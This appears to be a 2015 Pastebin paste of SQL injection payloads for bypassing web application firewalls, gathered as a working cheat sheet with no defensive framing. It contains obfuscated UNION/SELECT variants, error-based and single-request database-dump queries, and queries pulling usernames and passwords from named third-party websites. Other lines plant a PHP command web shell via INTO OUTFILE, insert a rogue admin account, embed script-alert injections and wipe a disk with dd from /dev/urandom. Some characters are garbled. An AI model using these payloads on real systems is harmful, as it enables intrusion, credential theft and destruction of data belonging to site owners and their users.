API tools faq
paste
Advertisement
Kyfx

SQLI Injction WAF Bypass Methods With Details

Kyfx
Mar 19th, 2015
825
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.74 KB | None | 0 0
raw download clone embed print report
  1. SQLI Injction WAF Bypass Methods With Details
  2. ----------------------------------------------
  3. --'- : +--+ / : -- - : --+- : /*
  4. ) order by 1-- -
  5. ') order by 1-- -
  6.  
  7. ')order by 1%23%23
  8.  
  9. %')order by 1%23%23
  10.  
  11. Null' order by 100--+
  12.  
  13. Null' order by 9999--+
  14.  
  15. ')group by 99-- -
  16.  
  17. 'group by 119449-- -
  18.  
  19. 'group/**/by/**/99%23%23
  20.  
  21. union select ByPassing method
  22.  
  23. +union+distinct+select+
  24.  
  25. +union+distinctROW+select+
  26.  
  27. /**//*!12345UNION SELECT*//**/
  28.  
  29. /**//*!50000UNION SELECT*//**/
  30.  
  31. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  32.  
  33. +/*!u%6eion*/+/*!se%6cect*/+
  34.  
  35. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  36.  
  37. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  38.  
  39. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  40.  
  41. union /*!50000%53elect*/
  42.  
  43. %55nion %53elect
  44.  
  45. +--+Union+--+Select+--+
  46.  
  47. +UnIoN/*&a=*/SeLeCT/*&a=*/
  48.  
  49. id=1+�UnI�On�+'SeL�ECT�
  50.  
  51. id=1+'UnI'||'on'+SeLeCT'
  52.  
  53. UnIoN SeLeCt CoNcAt(version())--
  54.  
  55. uNiOn aLl sElEcT
  56.  
  57. uUNIONnion all sSELECTelect
  58.  
  59. ===================================================================================================================================
  60. :: Buffer Overflow ::
  61. ===================================================================================================================================
  62. +And(select 1)=(select 0�414)+union+select+1�
  63.  
  64. +And(select 1)=(select 0xAAAA)+union+select+1�
  65.  
  66. +And(select 1)=(select 0�4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  67.  
  68. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  69.  
  70. ==================================================================================================================================
  71. :: 400 Bad Request ::
  72. ==================================================================================================================================
  73. �+%0A
  74.  
  75. union+select+1�+%0A,2�+%0A,3�+%0A,4�+%0A,5�+%0A �
  76.  
  77. ==================================================================================================================================
  78. null the parameter
  79. ==================================================================================================================================
  80. id=-1
  81.  
  82. id=null
  83.  
  84. id=1+and+false+
  85.  
  86. id=9999
  87.  
  88. id=1 and 0
  89.  
  90. id==1
  91.  
  92. id=(-1)
  93.  
  94. =======================================================================================================================================
  95. Group_Concat
  96. =======================================================================================================================================
  97. Group_Concat
  98.  
  99. group_concat()
  100.  
  101. /*!group_concat*/()
  102.  
  103. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  104.  
  105. group_concat(,0x3c62723e)
  106.  
  107. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  108.  
  109. CoNcAt()
  110.  
  111. CONCAT(DISTINCT Version())
  112.  
  113. concat(,0x3a,)
  114.  
  115. concat%00()
  116.  
  117. %00CoNcAt()
  118.  
  119. /*!50000cOnCat*/(/*!Version()*/)
  120.  
  121. /*!50000cOnCat*/
  122.  
  123. /**//*!12345cOnCat*/(,0x3a,)
  124.  
  125. concat_ws()
  126.  
  127. concat(0x3a,,0x3c62723e)
  128.  
  129. /*!concat_ws(0x3a,)*/
  130.  
  131. concat_ws(0x3a3a3a,version()
  132.  
  133. CONCAT_WS(CHAR(32,58,32),version(),)
  134.  
  135. REVERSE(tacnoc)
  136.  
  137. binary(version())
  138.  
  139. uncompress(compress(version()))
  140.  
  141. aes_decrypt(aes_encrypt(version(),1),1)
  142.  
  143. ====================================================================================================================================
  144. To appear column numbr in page put after id
  145. ====================================================================================================================================
  146. id=1+and+1=0+union+select+1,2,3,4,5,6
  147.  
  148. +AND+1=0
  149.  
  150. /*!aND*/ 1 like 0
  151.  
  152. +/*!and*/+1=0
  153.  
  154. +and+2>3+
  155.  
  156. +and(1)=(0)
  157.  
  158. and (1)!=(0)
  159.  
  160. +div+0
  161.  
  162. Having+1=0
  163.  
  164. ===================================================================================================================================
  165. function ByPassing
  166. ===================================================================================================================================
  167. unhex(hex(value))
  168.  
  169. cast(value as char)
  170.  
  171. uncompress(compress(version()))
  172.  
  173. cast(version() as char)
  174.  
  175. aes_decrypt(aes_encrypt(version(),1),1)
  176.  
  177. binary(version())
  178.  
  179. convert(value using ascii)
  180.  
  181. ===================================================================================================================================
  182. avoid source page injection
  183. ===================================================================================================================================
  184. concat(?�>,
  185.  
  186.  
  187. ,@@version,?
  188.  
  189. �>
  190. ?
  191.  
  192. injection
  193.  
  194. concat(0x223e,@@version)
  195.  
  196. concat(0x273e27,version(),0x3c212d2d)
  197.  
  198. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  199.  
  200. concat(0x223e,@@version,0x3c696d67207372633d22)
  201.  
  202. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  203.  
  204. concat(0x223e3c62723e,@@version,0x3a,�BlackRose�,0x3c696d67207372633d22)
  205.  
  206. concat(��,@@version,��)
  207.  
  208. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  209.  
  210. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  211.  
  212. ===================================================================================================================================
  213. get version � DB_NAME � user � HOST_NAME � datadir
  214. ===================================================================================================================================
  215. version()
  216.  
  217. convert(version() using latin1)
  218.  
  219. unhex(hex(version()))
  220.  
  221. @@GLOBAL.VERSION
  222.  
  223. (substr(@@version,1,1)=5) :: 1 true 0 fals
  224.  
  225. # like #
  226.  
  227. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 �
  228.  
  229. ==================================================================================================================================
  230. +and substring(version(),1,1)=4
  231.  
  232. +and substring(version(),1,1)=5
  233.  
  234. +and substring(version(),1,1)=9
  235.  
  236. +and substring(version(),1,1)=10
  237.  
  238. id=1 /*!50094aaaa*/ error
  239.  
  240. id=1 /*!50095aaaa*/ no error
  241.  
  242. id=1 /*!50096aaaa*/ error
  243.  
  244. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  245.  
  246. id=1 /*!40123 1=1*/�+- no error
  247.  
  248. id=1 /*!40122rrrr*/ no error
  249.  
  250. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  251. =================================================================================================================================
  252. DB_NAME()
  253. =================================================================================================================================
  254. @@database
  255. database()
  256. id=vv()
  257. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 �
  258. http://www.marinaplast.com/page.php?id=vv()
  259. @@user
  260. user()
  261. user_name()
  262. system_user()
  263. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 �
  264.  
  265. HOST_NAME()
  266. @@hostname
  267. @@servername
  268. SERVERPROPERTY()
  269.  
  270. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 �
  271. @@datadir
  272. datadir()
  273. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 �
  274. ASPX
  275. and 1=0/@@version
  276. � and 1=0/@@version;�
  277. �) and 1=@@version�
  278. and 1=0/user;�
  279.  
  280. Requested method
  281. [DUMP DB in 1 Request]
  282.  
  283. (select (@) from (select(@:=0�00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,� [ ',table_schema,' ] >�,table_name,� > �,column_name))))x)
  284.  
  285. (select(@) from (select (@:=0�00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  286. ===================================================================================================================================
  287. [DUMP DB in 1 Request improve]
  288. ===================================================================================================================================
  289.  
  290. (select(@x)from(select(@x:=0�00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0�00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  291.  
  292. like
  293. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0�00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0�00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 �
  294. ===================================================================================================================================
  295. #2#
  296. ===================================================================================================================================
  297. method like DUMP DB in 1 Request
  298. ===================================================================================================================================
  299. concat(@i:=0�00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  300. like
  301. http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0�00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  302. ===================================================================================================================================
  303. #3#
  304. ===================================================================================================================================
  305. databases
  306.  
  307. (select+count(schema_name) +from+information_schema.schemata)
  308.  
  309. # like #
  310. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 �
  311.  
  312. tables
  313. (select+count(table_name) +from+information_schema.tables)
  314. # like #
  315. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 �
  316.  
  317. columns
  318. (select+count(column_name) +from+information_schema.columns)
  319. # like #
  320. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 �
  321. ===================================================================================================================================
  322. #4#
  323. ===================================================================================================================================
  324. show the table with all her columns
  325.  
  326. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  327.  
  328. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1�+
  329.  
  330. like
  331. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1�+
  332. ===================================================================================================================================
  333. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  334. ===================================================================================================================================
  335. feltered requested
  336.  
  337. # tables #
  338. group_concat(/*!table_name*/)
  339.  
  340. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES� -
  341.  
  342. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()� -
  343.  
  344. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()� -
  345. ===================================================================================================================================
  346. # columns #
  347. ===================================================================================================================================
  348. group_concat(/*!column_name*/)
  349.  
  350. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  351.  
  352. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  353.  
  354. /*!froM*/ table� -
  355. ===================================================================================================================================
  356. #6#
  357. ===================================================================================================================================
  358. bypass method
  359.  
  360. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  361.  
  362. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  363.  
  364. like
  365. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 �
  366. ===================================================================================================================================
  367. #7#
  368. ===================================================================================================================================
  369. bypass method
  370.  
  371. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  372.  
  373. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  374.  
  375. like
  376. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)�
  377.  
  378. ===================================================================================================================================
  379. [+] Union Select:
  380. ===================================================================================================================================
  381. union /*!select*/+
  382. union/**/select/**/
  383. /**/union/**/select/**/
  384. /**/union/*!50000select*/
  385. /**//*!12345UNION SELECT*//**/
  386. /**//*!50000UNION SELECT*//**/
  387. /**/uniUNIONon/**/selSELECTect/**/
  388. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  389. /**//*!union*//**//*!select*//**/
  390. /**/UNunionION/**/SELselectECT/**/
  391. /**//*UnIOn*//**//*SEleCt*//**/
  392. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  393. /**/UNunionION/**/all/**/SELselectECT/**/
  394. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  395. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  396. uni
  397. %20union%20/*!select*/%20
  398. union%23aa%0Aselect
  399. union+distinct+select+
  400. union+distinctROW+select+
  401. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  402. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  403. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  404. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  405. /*!u%6eion*/+/*!se%6cect*/+
  406. 1%�)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  407. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  408. union /*!50000%53elect*/
  409. +%2F**/+Union/*!select*/
  410. %55nion %53elect
  411. +�+Union+�+Select+�+
  412. +UnIoN/*&a=*/SeLeCT/*&a=*/
  413. uNiOn aLl sElEcT
  414. uUNIONnion all sSELECTelect
  415. union(select(1),2,3)
  416. union (select 1111,2222,3333)
  417. union (/*!/**/ SeleCT */ 11)
  418. %0A%09UNION%0CSELECT%10NULL%
  419. /*!union*//*�*//*!all*//*�*//*!select*/
  420. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  421. union+sel%0bect
  422. +uni*on+sel*ect+
  423. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  424. union(select (1),(2),(3),(4),(5))
  425. UNION(SELECT(column)FROM(table))
  426. id=1+�UnI�On�+�SeL�ECT�
  427. id=1+�UnI�||�on�+SeLeCT�
  428. union select 1�+%0A,2�+%0A,3�+%0A etc �.
  429. ===================================================================================================================================
  430. [+] Buffer overflow:
  431. ===================================================================================================================================
  432. +And(select 1)=(select 0�414)+union+select+1�
  433. +And(select 1)=(select 0xAAAA)+union+select+1�
  434. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  435. +and (/*!select*/ 1)=(/*!select*/ 0�414)+
  436. +And(select 1)=(select 0�4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  437. ===================================================================================================================================
  438. [+] Group Concat:
  439. ===================================================================================================================================
  440. Group_Concat
  441. group_concat()
  442. /*!group_concat*/()
  443. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  444. group_concat(,0x3c62723e)
  445. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  446. CoNcAt()
  447. CONCAT(DISTINCT Version())
  448. concat(,0x3a,)
  449. concat%00()
  450. %00CoNcAt()
  451. /*!50000cOnCat*/(/*!Version()*/)
  452. /*!50000cOnCat*/
  453. /**//*!12345cOnCat*/(,0x3a,)
  454. concat_ws()
  455. concat(0x3a,,0x3c62723e)
  456. /*!concat_ws(0x3a,)*/
  457. concat_ws(0x3a3a3a,version()
  458. CONCAT_WS(CHAR(32,58,32),version(),)
  459. ===================================================================================================================================
  460. ERORE BASED
  461. ===================================================================================================================================
  462. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1�
  463.  
  464. Database
  465.  
  466. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  467.  
  468. Table_name
  469.  
  470. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  471.  
  472. Columns
  473.  
  474. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  475.  
  476. extract date
  477.  
  478. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  479.  
  480. Notice the limit function in the query
  481. A website can have more than 2 two databases, so increase the limit until you find all database names
  482. Example: limit 0,1 or limit 1,1 or limit 2,1
  483. ===================================================================================================================================
  484. Differences:
  485. Error Based Query for Database Extraction:
  486. ===================================================================================================================================
  487. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  488.  
  489. Double Query for Database Extraction:
  490.  
  491. and(select 1 from(select count(*),concat((select (select concat(0x7e,0�27,cast(database() as char),0�27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  492. information_schema.tables group by x)a) and 1=1
  493.  
  494. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  495. concat(0x7e,0�27,cast(schema_name as char),0�27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  496. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  497.  
  498. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  499. concat(0x7e,0�27,cast(table_name as char),0�27,0x7e) FROM information_schema.tables Where
  500. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  501. information_schema.tables group by x)a) and 1
  502. ===================================================================================================================================
  503. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))�+
  504. ===================================================================================================================================
  505.  
  506. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  507. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  508.  
  509. I�d say using concat(0xY)
  510.  
  511. Y being �� in hex
  512. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  513.  
  514. http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29�+
  515.  
  516. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(�0x�, hex(�users�)
  517.  
  518. =113'+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0�00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,� [ ',table_schema,' ] >�,table_name,� > �,column_name,0x27293B3C2F7363726970743E))))x),3�+�
  519.  
  520. injection in sql database addd new user
  521. INSERT INTO admins (`name`,`password`,`email`) VALUES (�unix�,'unixunix�,'[email protected]�)
  522.  
  523. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  524.  
  525. CHALLENGES
  526.  
  527. Code:
  528. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0�7365637572697479))�+-
  529. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1�
  530. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security�
  531. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7� -
  532. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)�+-
  533. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  534. null�+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata� x
  535. ===================================================================================================================================
  536. Error Based:
  537. ===================================================================================================================================
  538. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1�
  539.  
  540. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  541.  
  542. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1� -
  543. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 � -
  544.  
  545. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  546.  
  547. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  548.  
  549. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)� x
  550.  
  551. or 1=convert(int,(@@version))-
  552. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1�
  553. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  554.  
  555. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))�+-
  556. ===================================================================================================================================
  557. WAF BYPASS BY TOTTI
  558. ===================================================================================================================================
  559.  
  560. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())� -
  561.  
  562. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()� -
  563.  
  564. ===================================================================================================================================
  565. WUBI � 1,(select(@x)from(select(@x:=0�00),(select(0)from(information_schema.columns)where(table_schema!=0�69)and(0�00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4�
  566.  
  567. (select (@) from (select(@:=0�00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,� [ ',table_schema,' ] >�,table_name,� > �,column_name))))x)
  568. (select (@) from (select (@x:=0�00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  569.  
  570. (select (@) from (select (@x:=0�00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  571. ===================================================================================================================================
  572.  
  573. +and+1=convert(int,SERVERPROPERTY(�ProductVersion�))
  574. ===================================================================================================================================
  575.  
  576. http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
  577.  
  578. http://www.websec.ca/kb/sql_injection
  579.  
  580. http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html
  581.  
  582. ===================================================================================================================================
  583. test
  584.  
  585. http://www.mt.ro/nou/articol.php?id=-angajari�+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))�+
  586.  
  587. �������������..
  588. http://www.mt.ro/nou/articol.php?id=-angajari� and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)�+
  589.  
  590. SELECT � system($_REQUEST['cmd']); ?>�
  591. INTO OUTFILE �full/path/here/cmd.php�
  592.  
  593.  
  594.  
  595. ------------Best Bypass WAF------------
  596. ========================
  597.  
  598. [~] order by [~]
  599. /**/ORDER/**/BY/**/
  600. /*!order*/+/*!by*/
  601. /*!ORDER BY*/
  602. /*!50000ORDER BY*/
  603. /*!50000ORDER*//**//*!50000BY*/
  604. /*!12345ORDER*/+/*!BY*/
  605.  
  606. [~] UNION select [~]
  607. /*!00000Union*/ /*!00000Select*/
  608. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  609. %55nion %53elect
  610. %55nion(%53elect 1,2,3)-- -
  611. +union+distinct+select+
  612. +union+distinctROW+select+
  613. /**//*!12345UNION SELECT*//**/
  614. /**//*!50000UNION SELECT*//**/
  615. /**/UNION/**//*!50000SELECT*//**/
  616. /*!50000UniON SeLeCt*/
  617. union /*!50000%53elect*/
  618. + #?uNiOn + #?sEleCt
  619. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  620. /*!%55NiOn*/ /*!%53eLEct*/
  621. /*!u%6eion*/ /*!se%6cect*/
  622. +un/**/ion+se/**/lect
  623. uni%0bon+se%0blect
  624. %2f**%2funion%2f**%2fselect
  625. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  626. REVERSE(noinu)+REVERSE(tceles)
  627. /*--*/union/*--*/select/*--*/
  628. union (/*!/**/ SeleCT */ 1,2,3)
  629. /*!union*/+/*!select*/
  630. union+/*!select*/
  631. /**/union/**/select/**/
  632. /**/uNIon/**/sEleCt/**/
  633. +%2F**/+Union/*!select*/
  634. /**//*!union*//**//*!select*//**/
  635. /*!uNIOn*/ /*!SelECt*/
  636. +union+distinct+select+
  637. +union+distinctROW+select+
  638. uNiOn aLl sElEcT
  639. UNIunionON+SELselectECT
  640. /**/union/*!50000select*//**/
  641. 0%a0union%a0select%09
  642. %0Aunion%0Aselect%0A
  643. %55nion/**/%53elect
  644. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  645. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  646. %0A%09UNION%0CSELECT%10NULL%
  647. /*!union*//*--*//*!all*//*--*//*!select*/
  648. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  649. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  650. +UnIoN/*&a=*/SeLeCT/*&a=*/
  651. union+sel%0bect
  652. +uni*on+sel*ect+
  653. +#1q%0Aunion all#qa%0A#%0Aselect
  654. union(select (1),(2),(3),(4),(5))
  655. UNION(SELECT(column)FROM(table))
  656. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  657. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  658. union(select(1),2,3)
  659. union (select 1111,2222,3333)
  660. uNioN (/*!/**/ SeleCT */ 11)
  661. union (select 1111,2222,3333)
  662. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  663. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  664. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  665. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  666. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  667. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  668. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  669. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  670. /union\sselect/g
  671. /union\s+select/i
  672. /*!UnIoN*/SeLeCT
  673. +UnIoN/*&a=*/SeLeCT/*&a=*/
  674. +uni>on+sel>ect+
  675. +(UnIoN)+(SelECT)+
